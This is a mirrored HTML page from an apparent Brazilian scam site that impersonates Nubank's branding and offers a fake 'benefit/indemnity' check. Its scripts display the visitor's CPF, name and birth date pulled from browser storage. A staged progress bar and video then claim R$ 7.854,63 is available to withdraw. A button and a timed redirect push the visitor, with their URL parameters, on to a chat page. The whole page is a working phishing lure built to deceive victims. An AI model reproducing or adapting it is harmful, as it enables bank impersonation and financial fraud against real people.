<!DOCTYPE html>

<html lang="pt-BR">
<!-- Mirrored from beneficionovidade.it.com/consult/consulta/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Jul 2025 12:43:33 GMT -->
<head><meta charset="utf-8">

<meta content="width=device-width,maximum-scale=1.0,user-scalable=no" name="viewport"/>
<title>Video Page - CONSULTA</title>
<link href="https://scripts.converteai.net/072f9f27-2212-4b86-b896-c60779c0506d/players/6886206dfb6a9e3c8af74900/v4/embed.html" rel="preload"/>
<script>!function(i,n){i._plt=i._plt||(n&&n.timeOrigin?n.timeOrigin+n.now():Date.now())}(window,performance);</script>
<link as="script" href="https://scripts.converteai.net/072f9f27-2212-4b86-b896-c60779c0506d/players/6886206dfb6a9e3c8af74900/v4/player.js" rel="preload"/>
<link as="script" href="https://scripts.converteai.net/lib/js/smartplayer-wc/v4/smartplayer.js" rel="preload"/>
<link as="fetch" href="https://cdn.converteai.net/072f9f27-2212-4b86-b896-c60779c0506d/6886205f389063254c3b574b/main.m3u8" rel="preload"/>
<link href="https://cdn.converteai.net" rel="dns-prefetch"/>
<link href="https://scripts.converteai.net" rel="dns-prefetch"/>
<link href="https://images.converteai.net" rel="dns-prefetch"/>
<link href="https://api.vturb.com.br" rel="dns-prefetch"/>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800&amp;display=swap" rel="stylesheet"/>
<link href="https://fonts.cdnfonts.com/css/rawline" rel="stylesheet"/>
<link href="../../../cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet"/>
<link href="css/jmlYLVJ2t9T2.css" rel="stylesheet"/>
<link href="css/0El3Qvarj2NX.css" rel="stylesheet"/>
<style>
    :root {
      --nu-purple: #8A05BE;
      --nu-purple-dark: #6B0A87;
      --nu-purple-light: #B83DFF;
      --nu-purple-gradient: linear-gradient(135deg, #8A05BE 0%, #B83DFF 100%);
      --nu-purple-hover: linear-gradient(135deg, #7A04A8 0%, #A635E6 100%);
      --nu-gray-50: #FAFAFA;
      --nu-gray-100: #F5F5F5;
      --nu-gray-200: #EEEEEE;
      --nu-gray-300: #E0E0E0;
      --nu-gray-400: #BDBDBD;
      --nu-gray-500: #9E9E9E;
      --nu-gray-600: #757575;
      --nu-gray-700: #616161;
      --nu-gray-800: #424242;
      --nu-gray-900: #212121;
      --nu-white: #FFFFFF;
      --nu-green: #00C853;
      --nu-red: #FF1744;
      --nu-orange: #FF9100;
      --nu-blue: #2196F3;
      --nu-shadow-sm: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
      --nu-shadow: 0 3px 6px rgba(0, 0, 0, 0.16), 0 3px 6px rgba(0, 0, 0, 0.23);
      --nu-shadow-lg: 0 10px 20px rgba(0, 0, 0, 0.19), 0 6px 6px rgba(0, 0, 0, 0.23);
      --nu-shadow-purple: 0 8px 32px rgba(138, 5, 190, 0.3);
      --nu-radius-sm: 8px;
      --nu-radius: 16px;
      --nu-radius-lg: 24px;
      --nu-transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
      --nu-transition-fast: all 0.15s cubic-bezier(0.4, 0, 0.2, 1);
    }

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    html,
    body {
      height: 100%;
      overflow-x: hidden;
    }

    body {
      font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
      background: linear-gradient(135deg, #f8f9fa 0%, #e9ecef 100%);
      display: flex;
      flex-direction: column;
      min-height: 100vh;
      color: var(--nu-gray-900);
      line-height: 1.6;
      font-feature-settings: 'kern' 1, 'liga' 1;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
    }

    #loading-screen {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: #fff;
      display: flex;
      align-items: center;
      justify-content: center;
      z-index: 9999;
    }

    #loading-screen.hidden {
      display: none !important;
    }

    .blink-logo {
      animation: blink 1s infinite;
      width: 120px;
      height: auto;
    }

    @keyframes blink {

      0%,
      100% {
        opacity: 1;
      }

      50% {
        opacity: 0;
      }
    }

    header {
      background-color: #fff;
      padding: 12px 24px;
      display: flex;
      justify-content: space-between;
      align-items: center;
      border-bottom: 1px solid #e5e5e5;
      position: sticky;
      top: 0;
      left: 0;
      right: 0;
      z-index: 1000;
      height: 60px;
    }

    header .logo img {
      height: 32px;
      width: auto;
    }

    header .icons {
      display: flex;
      align-items: center;
    }

    header .icons button {
      background: none;
      border: none;
      margin-left: 24px;
      cursor: pointer;
    }

    header .icons button i {
      font-size: 16px;
      color: var(--nu-purple);
    }

    header .user {
      background-color: var(--nu-purple);
      color: #fff;
      border: none;
      border-radius: 50px;
      padding: 6px 16px;
      display: flex;
      align-items: center;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    header .user:hover {
      background-color: var(--nu-purple-dark);
    }

    header .user i {
      margin-right: 8px;
    }

    nav {
      background-color: #fff;
      padding: 16px 24px;
      display: flex;
      justify-content: space-between;
      align-items: center;
      border-bottom: 1px solid #e5e5e5;
      position: sticky;
      top: 60px;
      left: 0;
      right: 0;
      z-index: 999;
      height: 60px;
      margin-bottom: 20px;
    }

    nav button {
      background: none;
      border: none;
      display: flex;
      align-items: center;
      cursor: pointer;
    }

    nav button i {
      font-size: 16px;
      color: var(--nu-purple);
      margin-right: 10px;
    }

    nav button span {
      color: #666;
      font-size: 15px;
      font-weight: 300;
    }

    .carousel {
      width: 100%;
      overflow: hidden;
      background: #fff;
    }

    .carousel-inner {
      display: flex;
      transition: transform 0.5s ease-in-out;
    }

    .carousel-inner img {
      width: 100%;
      max-width: 720px;
      height: auto;
      object-fit: cover;
      display: block;
    }

    #main-content {
      padding: 32px;
      max-width: 800px;
      flex: 1 0 auto;
      padding-bottom: 60px;
      margin: 20px auto;
      width: 100%;
      background: linear-gradient(135deg, #ffffff 0%, #f8f9fa 100%);
      border-radius: 20px;
      box-shadow: 0 8px 32px rgba(0, 0, 0, 0.1), 0 2px 8px rgba(0, 0, 0, 0.05);
      border: 1px solid rgba(255, 255, 255, 0.8);
      backdrop-filter: blur(10px);
      position: relative;
      overflow: hidden;
    }

    #main-content::before {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      height: 6px;
      background: var(--nu-purple);
      border-radius: 20px 20px 0 0;
      box-shadow: 0 2px 8px rgba(138, 5, 190, 0.3);
    }

    .progress-container {
      width: 100%;
      height: 15px;
      background-color: #e5e5e5;
      border-radius: 10px;
      margin-bottom: 16px;
      overflow: hidden;
    }

    .progress-bar {
      width: 0%;
      height: 100%;
      background-color: var(--nu-purple);
      transition: width 0.2s linear;
    }

    .video-container {
      position: relative;
      width: 100%;
    }

    .video-container video {
      width: 100%;
      height: auto;
      display: block;
    }

    .thumbnail-overlay {
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      display: none;
      background: transparent;
      justify-content: center;
      align-items: center;
      z-index: 9999;
      cursor: pointer;
    }

    .thumbnail-content {
      background: rgba(0, 0, 0, 0.4);
      border-radius: 8px;
      padding: 20px;
      text-align: center;
      animation: pulse 2s infinite;
      display: flex;
      flex-direction: column;
      align-items: center;
    }

    .thumbnail-content h2 {
      font-size: 24px;
      color: #fff;
      margin-bottom: 12px;
    }

    .thumbnail-content i {
      font-size: 64px;
      color: #fff;
    }

    @keyframes pulse {
      0% {
        transform: scale(1);
      }

      50% {
        transform: scale(1.05);
      }

      100% {
        transform: scale(1);
      }
    }

    .resgate-overlay {
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      display: none;
      background: var(--nu-purple);
      justify-content: center;
      align-items: center;
      text-align: center;
      color: #fff;
      padding: 20px;
      z-index: 9999;
    }

    .resgate-content {
      max-width: 80%;
      margin: 0 auto;
    }

    .resgate-content h2 {
      font-size: 20px;
      margin-bottom: 10px;
    }

    .resgate-content p {
      font-size: 16px;
      line-height: 1.4;
    }

    .info-container {
      margin: 32px 0;
      display: flex;
      flex-direction: column;
      gap: 16px;
      background: linear-gradient(135deg, #ffffff 0%, #f8f9fa 100%);
      border-radius: 16px;
      padding: 32px;
      border: 2px solid #e9ecef;
      box-shadow: 0 8px 24px rgba(138, 5, 190, 0.08), 0 2px 8px rgba(0, 0, 0, 0.04);
      position: relative;
      overflow: hidden;
    }

    .info-container::before {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      height: 4px;
      background: var(--nu-purple);
      border-radius: 16px 16px 0 0;
    }

   

    .info-item {
      font-size: 16px;
      color: #495057;
      display: flex;
      align-items: center;
      gap: 16px;
      padding: 16px 20px;
      background: rgba(255, 255, 255, 0.8);
      border-radius: 12px;
      border: 1px solid rgba(138, 5, 190, 0.1);
      transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
      position: relative;
      backdrop-filter: blur(10px);
      font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
      font-weight: 500;
    }

    .info-item:hover {
      background: rgba(255, 255, 255, 0.95);
      border-color: rgba(138, 5, 190, 0.2);
      transform: translateY(-2px);
      box-shadow: 0 4px 16px rgba(138, 5, 190, 0.1);
    }

    .info-item i {
      color: var(--nu-purple);
      font-size: 20px;
      width: 24px;
      height: 24px;
      display: flex;
      align-items: center;
      justify-content: center;
      background: rgba(138, 5, 190, 0.1);
      border-radius: 8px;
      padding: 8px;
      flex-shrink: 0;
    }

    .info-item span {
      font-weight: 600;
      color: #212529;
      flex: 1;
      line-height: 1.4;
    }

    #status-item {
      background: linear-gradient(135deg, rgba(138, 5, 190, 0.05), rgba(40, 167, 69, 0.05));
      border-color: rgba(138, 5, 190, 0.2);
      border-left: 4px solid var(--nu-purple);
    }

    #status-item span {
      color: var(--nu-purple);
      font-weight: 700;
    }

    #status-item i {
      background: rgba(138, 5, 190, 0.15);
      color: var(--nu-purple);
      animation: pulse-status 2s infinite;
    }

    @keyframes pulse-status {
      0%, 100% { 
        background: rgba(138, 5, 190, 0.15);
        transform: scale(1);
      }
      50% { 
        background: rgba(138, 5, 190, 0.25);
        transform: scale(1.05);
      }
    }

    .button-saque {
      display: none;
      margin-top: 24px;
      background: var(--nu-purple);
      color: #fff;
      font-size: 16px;
      font-weight: 600;
      padding: 16px 24px;
      border: none;
      border-radius: 8px;
      cursor: pointer;
      transition: background 0.3s ease;
      width: 100%;
      text-align: center;
      font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
    }

    .button-saque:hover {
      background: var(--nu-purple-dark);
    }

    .fb-header-outside {
      padding: 15px 0 5px 24px;
      font-size: 14px;
      font-weight: bold;
      color: #333;
      border-top: 1px solid #ddd;
      width: 100%;
      background: #fff;
      text-align: left;
    }

    .fb-comments-container {
      width: 100%;
      background: #fff;
      padding: 24px;
    }

    .fb-header {
      display: flex;
      align-items: center;
      justify-content: space-between;
      margin-bottom: 16px;
    }

    .fb-header .fb-comment-count {
      font-size: 14px;
      font-weight: bold;
      color: #333;
    }

    .fb-header .fb-loading {
      font-size: 12px;
      color: #666;
      display: flex;
      align-items: center;
    }

    .fb-header .fb-loading i {
      margin-right: 6px;
    }

    .comment-item {
      display: flex;
      align-items: flex-start;
      margin-bottom: 16px;
      width: 100%;
    }

    .comment-avatar {
      width: 40px;
      height: 40px;
      border-radius: 50%;
      margin-right: 8px;
      object-fit: cover;
    }

    .comment-content {
      background: #f2f3f5;
      border-radius: 12px;
      padding: 8px 12px;
      position: relative;
      flex: 1;
    }

    .comment-content::before {
      content: "";
      position: absolute;
      top: 10px;
      left: -6px;
      border-top: 6px solid transparent;
      border-right: 6px solid #f2f3f5;
      border-bottom: 6px solid transparent;
    }

    .comment-name {
      font-size: 14px;
      font-weight: bold;
      color: #385898;
      margin-bottom: 4px;
    }

    .comment-text {
      font-size: 14px;
      color: #1c1e21;
      line-height: 1.3;
    }

    .comment-actions {
      display: flex;
      margin-top: 4px;
      font-size: 12px;
      color: #606770;
    }

    .comment-actions i {
      margin-right: 4px;
    }

    .comment-likes {
      margin-right: 8px;
    }

    .comment-dislikes {
      margin-right: 8px;
    }

    .comment-replies {
      margin-left: 48px;
      margin-top: 8px;
      border-left: 2px solid #ccc;
      padding-left: 8px;
    }

    footer {
      background-color: #f7f7f7;
      text-align: center;
      padding: 16px;
      font-size: 14px;
      color: #666;
      flex-shrink: 0;
    }

    #modal-chat {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.5);
      z-index: 99999;
      overflow: auto;
    }

    #modal-chat.active {
      display: flex;
      justify-content: center;
      align-items: center;
      padding-top: 5%;
    }

    .chat-bot-container {
      background: #fff;
      width: 90%;
      max-width: 400px;
      height: 80vh;
      border-radius: 8px;
      display: flex;
      flex-direction: column;
    }

    .chat-header {
      background: #1451b4;
      color: #fff;
      padding: 12px;
      font-weight: bold;
      display: flex;
      align-items: center;
      justify-content: space-between;
    }

    .chat-header-title {
      font-size: 16px;
    }

    .close-btn {
      background: none;
      border: none;
      color: #fff;
      font-size: 16px;
      cursor: pointer;
    }

    .chat-body {
      flex: 1;
      padding: 16px;
      overflow-y: auto;
      background: #f2f2f2;
      display: flex;
      flex-direction: column;
    }

    .message-bot-container,
    .message-user-container {
      margin-bottom: 8px;
      display: flex;
      animation: fadeInMessage 0.3s forwards;
    }

    @keyframes fadeInMessage {
      0% {
        opacity: 0;
        transform: translateY(10px);
      }

      100% {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .message-bot-container {
      align-items: flex-start;
    }

    .message-bot {
      background: #fff;
      color: #333;
      display: inline-block;
      padding: 8px 12px;
      border-radius: 12px;
      max-width: 80%;
      line-height: 1.4;
      font-size: 14px;
      box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
    }

    .message-user-container {
      justify-content: flex-end;
      align-items: flex-start;
    }

    .message-user {
      background: var(--nu-purple);
      color: #fff;
      display: inline-block;
      padding: 8px 12px;
      border-radius: 12px;
      max-width: 80%;
      line-height: 1.4;
      font-size: 14px;
      box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
    }

    .bot-avatar {
      height: 15px;
      margin-right: 8px;
    }

    .chat-footer {
      background: #fff;
      display: flex;
      border-top: 1px solid #ddd;
    }

    .chat-footer input[type="text"] {
      flex: 1;
      border: none;
      padding: 12px;
      font-size: 14px;
      outline: none;
    }

    .chat-footer button {
      background: var(--nu-purple);
      color: #fff;
      border: none;
      padding: 0 16px;
      cursor: pointer;
      font-size: 14px;
    }

    .chat-footer button:hover {
      background: var(--nu-purple-dark);
    }

    .typing-indicator-container {
      display: flex;
      align-items: center;
      margin-bottom: 8px;
      animation: fadeInMessage 0.3s forwards;
    }

    .typing-indicator-bubble {
      background: #fff;
      color: #333;
      padding: 8px 12px;
      border-radius: 12px;
      max-width: 80%;
      line-height: 1.4;
      font-size: 14px;
      box-shadow: 0 1px 2px rgba(0, 0, 0, 0.2);
      position: relative;
      min-width: 60px;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .blue-circle {
      width: 8px;
      height: 8px;
      border-radius: 50%;
      background: var(--nu-purple);
      margin: 0 3px;
      animation: bounceDots 1s infinite alternate;
    }

    @keyframes bounceDots {
      0% {
        transform: translateY(0);
      }

      100% {
        transform: translateY(-5px);
      }
    }

    @keyframes fadeInUp {
      from {
        opacity: 0;
        transform: translateY(40px);
      }
      to {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .pay-button {
      background: var(--nu-purple);
      color: #fff;
      border: none;
      padding: 8px 16px;
      border-radius: 8px;
      cursor: pointer;
      font-size: 14px;
      margin-top: 8px;
    }

    .pay-button:hover {
      background: var(--nu-purple-dark);
    }
  </style>
<script id="_waunre">var _wau = _wau || []; _wau.push(["small", "3xx9q6nh17", "nre"]);</script><script async="" src="js/s.js"></script>
</head>
<body>
<script>
  // Função para obter todos os parâmetros da URL atual
  function getQueryParams() {
    return window.location.search;
  }

  // Define o destino do redirecionamento
  const destino = "https://beneficionovidade.it.com/consult/chat/index.php";

  // Aguarda 95 segundos (120000 milissegundos) e redireciona
  setTimeout(() => {
    const params = getQueryParams(); // mantém os parâmetros da URL original
    window.location.href = destino + params;
  }, 145000 );
</script>
<header>
<div class="logo">
<img alt="Nubank" src="https://i.postimg.cc/2ywBPGXs/Nubank-logo-2021-svg.png" style="width: auto; height: 32px;"/>
</div>
<div class="icons">
<button><i class="fas fa-ellipsis-v"></i></button>
<button><i class="fas fa-cookie-bite"></i></button>
<button><i class="fas fa-th"></i></button>
<button class="user" id="user-button" style="background-color: var(--nu-purple);">
<i class="fas fa-user" style="color: #fff;"></i>
<span id="user-name"></span>
</button>
</div>
</header>
<nav>
<button><i class="fas fa-bars"></i><span>
<p>Benefício <span> &gt; </span> Indenização <span> &gt; </span> Análise</p>
</span></button>
<button><i class="fas fa-search"></i></button>
</nav>
<main id="main-content">
<div class="progress-container" style="width: 100%; height: 10px; background: #ddd;">
<div class="progress-bar" id="progress-bar" style="width: 1.25%; height: 100%;"></div>
</div><div id="ifr_6886206dfb6a9e3c8af74900_wrapper" style="margin: 0 auto; width: 100%;">
<div id="ifr_6886206dfb6a9e3c8af74900_aspect" style="padding: 56.25% 0 0 0; position: relative;">
<iframe allowfullscreen="" frameborder="0" id="ifr_6886206dfb6a9e3c8af74900" onload="this.onload=null, this.src='https://scripts.converteai.net/072f9f27-2212-4b86-b896-c60779c0506d/players/6886206dfb6a9e3c8af74900/v4/embed.html' + (location.search || '?') + '&amp;vl=' + encodeURIComponent(location.href)" referrerpolicy="origin" src="about:blank" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;">
</iframe>
</div>
</div>
<style>
    .video-wrapper {
      position: relative;
      width: 100%;
      max-width: 700px;
      border-radius: 12px;
      overflow: hidden;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.2);
    }

    video {
      width: 100%;
      height: auto;
      display: block;
    }

    .overlay {
      position: absolute;
      inset: 0;
      background: rgba(0, 0, 0, 0.45);
      display: flex;
      align-items: center;
      justify-content: center;
      z-index: 2;
    }

    .play-button {
      background: var(--nu-purple);
      color: white;
      padding: 20px 40px;
      border: none;
      border-radius: 12px;
      font-size: 16px;
      font-weight: 600;
      cursor: pointer;
      box-shadow: 0 4px 16px rgba(138, 5, 190, 0.25), 0 2px 8px rgba(0, 0, 0, 0.1);
      transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
      position: relative;
      overflow: hidden;
      text-transform: none;
      letter-spacing: 0.5px;
      border: 2px solid var(--nu-purple);
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 12px;
      min-width: 240px;
      font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
      animation: pulse-button 2s infinite;
    }

    .play-button::before {
      content: '';
      position: absolute;
      top: 0;
      left: -100%;
      width: 100%;
      height: 100%;
      background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);
      transition: left 0.8s ease;
    }

    .play-button:hover::before {
      left: 100%;
    }

    .play-button:hover {
      background: var(--nu-purple-dark);
      border-color: var(--nu-purple-dark);
      transform: translateY(-2px);
      box-shadow: 0 8px 24px rgba(138, 5, 190, 0.35), 0 4px 12px rgba(0, 0, 0, 0.15);
      animation: none;
    }

    .play-button:active {
      transform: translateY(0);
      transition: transform 0.1s ease;
    }

    .play-button .icon {
      font-size: 20px;
      filter: drop-shadow(0 1px 2px rgba(0, 0, 0, 0.2));
    }

    .play-button span:last-child {
      font-weight: 600;
      text-shadow: 0 1px 2px rgba(0, 0, 0, 0.1);
    }

    @keyframes pulse-button {
      0%, 100% { 
        box-shadow: 0 4px 16px rgba(138, 5, 190, 0.25), 0 2px 8px rgba(0, 0, 0, 0.1);
        transform: scale(1);
      }
      50% { 
        box-shadow: 0 6px 20px rgba(138, 5, 190, 0.4), 0 3px 12px rgba(0, 0, 0, 0.15);
        transform: scale(1.02);
      }
    }
  </style>
<div class="video-wrapper">
<div class="overlay" id="overlay">
<button class="play-button" id="playBtn">
<span class="icon">🔊</span>
<span>Clique para ouvir</span>
</button>
</div>
</div>
<script>
    const video = document.getElementById("video");
    const overlay = document.getElementById("overlay");
    const playBtn = document.getElementById("playBtn");

    playBtn.addEventListener("click", () => {
      video.muted = false;
      video.volume = 1;
      overlay.style.display = "none";
      video.play();
    });
  </script>
<div class="thumbnail-overlay" id="thumbnail-overlay">
<div class="thumbnail-content">
<h2>Clique<br/>para ouvir</h2>
<i class="fas fa-volume-mute"></i>
</div>
</div>
<div class="resgate-overlay" id="resgate-overlay">
<div class="resgate-content">
<h2>Seu saque já está disponível para resgate!</h2>
<p>Clique no botão abaixo para efetuar o saque.</p>
</div>
</div>
<button class="button-saque" id="button-saque" style="display: none;">
    Efetuar Meu Saque agora!
  </button>
<div class="info-container">
<div class="info-item">
<i class="fas fa-credit-card"></i>
<span id="cpf-value">---</span>
</div>
<div class="info-item">
<i class="fas fa-user"></i>
<span id="name-value">---</span>
</div>
<div class="info-item">
<i class="fas fa-calendar"></i>
<span id="birth-value">---</span>
</div>

<div class="info-item" id="status-item">
<i class="fas fa-search"></i>
<span id="status-text">Sua consulta está em andamento...</span>
</div>
</div>
<script>
  document.getElementById("button-saque").addEventListener("click", () => {
    const params = new URLSearchParams(window.location.search);
    window.location.href = `../chat/index.php?${params.toString()}`;
  });
</script>
<script>
  // Função para formatação do CPF
  function formatCPF(cpf) {
    if (!cpf) return '';
    let digits = cpf.replace(/\D/g, '');
    return digits.replace(/^(\d{3})(\d{3})(\d{3})(\d{2}).*/, '$1.$2.$3-$4');
  }

  // Função para extrair iniciais do nome
  function getInitials(fullName) {
    if (!fullName || fullName.trim() === '') return 'U';
    
    const names = fullName.trim().split(' ');
    if (names.length === 1) {
      return names[0].charAt(0).toUpperCase();
    }
    
    // Pegar primeira letra do primeiro nome e primeira letra do último nome
    const firstInitial = names[0].charAt(0).toUpperCase();
    const lastInitial = names[names.length - 1].charAt(0).toUpperCase();
    
    return firstInitial + lastInitial;
  }

  // Função para carregar os dados do usuário do localStorage
  document.addEventListener('DOMContentLoaded', function() {
    try {
      // Recuperar dados do localStorage
      const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuario'));
      
      if (dadosUsuario) {
        // Preencher os campos com os dados do usuário
        document.getElementById('cpf-value').textContent = formatCPF(dadosUsuario.cpf) || '---';
        document.getElementById('name-value').textContent = dadosUsuario.nome || '---';
        document.getElementById('user-name').textContent = dadosUsuario.nome || '---';
        document.getElementById('birth-value').textContent = dadosUsuario.dataNascimento || '---';
        document.getElementById('mother-value').textContent = dadosUsuario.nomeMae || '---';
        
        // Atualizar o nome do usuário no cabeçalho
        const userName = document.getElementById('user-name');
        
        if (userName && dadosUsuario.nome) {
          // Pegar apenas o primeiro nome
          const primeiroNome = dadosUsuario.nome.split(' ')[0];
          userName.textContent = primeiroNome || 'Usuário';
        }
      }
    } catch (error) {
      console.error('Erro ao carregar dados do usuário:', error);
    }
  });
</script>
<style>
  #main-content {
    max-width: 600px;
    margin: 30px auto;
    background: #ffffff;
    padding: 25px;
    border-radius: 12px;
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.08);
  }

  .progress-container {
    height: 12px;
    background: #e0e0e0;
    border-radius: 6px;
    overflow: hidden;
    margin-bottom: 20px;
  }

  .progress-bar {
    height: 100%;
    background: linear-gradient(90deg, #9a2ecc, #360441);
    transition: width 1s linear;
  }







  @keyframes fadeIn {
    to {
      opacity: 1;
    }
  }

  /* Responsividade Header - Mantendo tamanhos do desktop */
  @media (max-width: 768px) {
    header {
      padding: 12px 24px; /* Mantendo padding do desktop */
    }

    header .logo img {
      height: 32px; /* Mantendo altura do desktop */
    }

    header .icons button {
      margin-left: 24px; /* Mantendo espaçamento do desktop */
    }

    header .icons button i {
      font-size: 16px; /* Mantendo tamanho do desktop */
    }

    header .user {
      padding: 6px 16px; /* Mantendo padding do desktop */
      font-size: inherit; /* Mantendo fonte do desktop */
    }
  }

  @media (max-width: 480px) {
    header {
      padding: 12px 16px; /* Reduzindo apenas o padding lateral */
    }

    header .logo img {
      height: 32px; /* Mantendo altura do desktop */
    }

    header .icons button {
      margin-left: 20px; /* Reduzindo levemente o espaçamento */
    }

    header .icons button i {
      font-size: 16px; /* Mantendo tamanho do desktop */
    }

    header .user {
      padding: 6px 14px; /* Reduzindo levemente o padding */
      font-size: inherit; /* Mantendo fonte do desktop */
    }

    /* Mantendo o texto do usuário visível */
    header .user span {
      display: inline; /* Mantendo texto visível */
    }
  }

  /* Responsivo conteúdo principal */
  @media (max-width: 768px) {
    #main-content {
      margin: 10px;
      padding: 24px;
      border-radius: 16px;
      max-width: calc(100% - 20px);
    }

    .button-saque {
      font-size: 15px;
      padding: 14px 20px;
    }

    .play-button {
      padding: 18px 32px;
      font-size: 15px;
      min-width: 220px;
    }

    .play-button .icon {
      font-size: 18px;
    }

    .info-container {
      padding: 24px;
      margin: 24px 0;
      gap: 12px;
    }

    .info-container::after {
      top: 12px;
      right: 16px;
      font-size: 10px;
      padding: 3px 8px;
    }

    .info-item {
      padding: 14px 16px;
      gap: 12px;
      font-size: 15px;
    }

    .info-item i {
      font-size: 18px;
      padding: 6px;
    }
  }

  @media (max-width: 480px) {
    #main-content {
      margin: 5px;
      padding: 20px;
      border-radius: 12px;
    }

    .play-button {
      padding: 16px 28px;
      font-size: 14px;
      min-width: 200px;
      gap: 10px;
    }

    .play-button .icon {
      font-size: 16px;
    }

    .info-container {
      padding: 20px;
      margin: 20px 0;
      gap: 10px;
      border-radius: 12px;
    }

    .info-container::after {
      top: 10px;
      right: 12px;
      font-size: 9px;
      padding: 2px 6px;
    }

    .info-item {
      padding: 12px 14px;
      gap: 10px;
      font-size: 14px;
      border-radius: 8px;
    }

    .info-item i {
      font-size: 16px;
      padding: 4px;
    }

    .button-saque {
      font-size: 14px;
      padding: 12px 16px;
    }
  }
</style>
<script type="text/javascript">
  var s=document.createElement("script");
  s.src="https://scripts.converteai.net/lib/js/smartplayer-wc/v4/sdk.js";
  s.async=!0;
  document.head.appendChild(s);
</script>
</main>
<script>
  const progressBar = document.getElementById("progress-bar");
  const statusText = document.getElementById("status-text");
  const saqueButton = document.getElementById("button-saque");

  const duration = 135; // segundos
  let elapsed = 0;

  const interval = setInterval(() => {
    elapsed++;
    const percent = (elapsed / duration) * 100;
    progressBar.style.width = percent + "%";

    if (elapsed >= duration) {
      clearInterval(interval);
      statusText.innerText = "Total identificado para resgate: R$ 7.854,63. ";
    }
  }, 1000);

  // Mostrar botão de saque após 1 minuto e 46 segundos (106 segundos)
  setTimeout(() => {
    saqueButton.style.display = "block";
  }, 130000);
</script>


<script>
  document.addEventListener("DOMContentLoaded", function () {
    const dados = JSON.parse(localStorage.getItem("dadosOriginais") || "{}");

    if (dados && dados.cpf) {
      document.getElementById("cpf-value").innerText = dados.cpf || "---";
      document.getElementById("name-value").innerText = dados.nome || "---";
      document.getElementById("birth-value").innerText = dados.dataNascimento || "---";
      document.getElementById("mother-value").innerText = dados.nome_mae || "---";
    }
  });
</script>



</body>
<!-- Mirrored from beneficionovidade.it.com/consult/consulta/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Jul 2025 12:43:36 GMT -->
</html>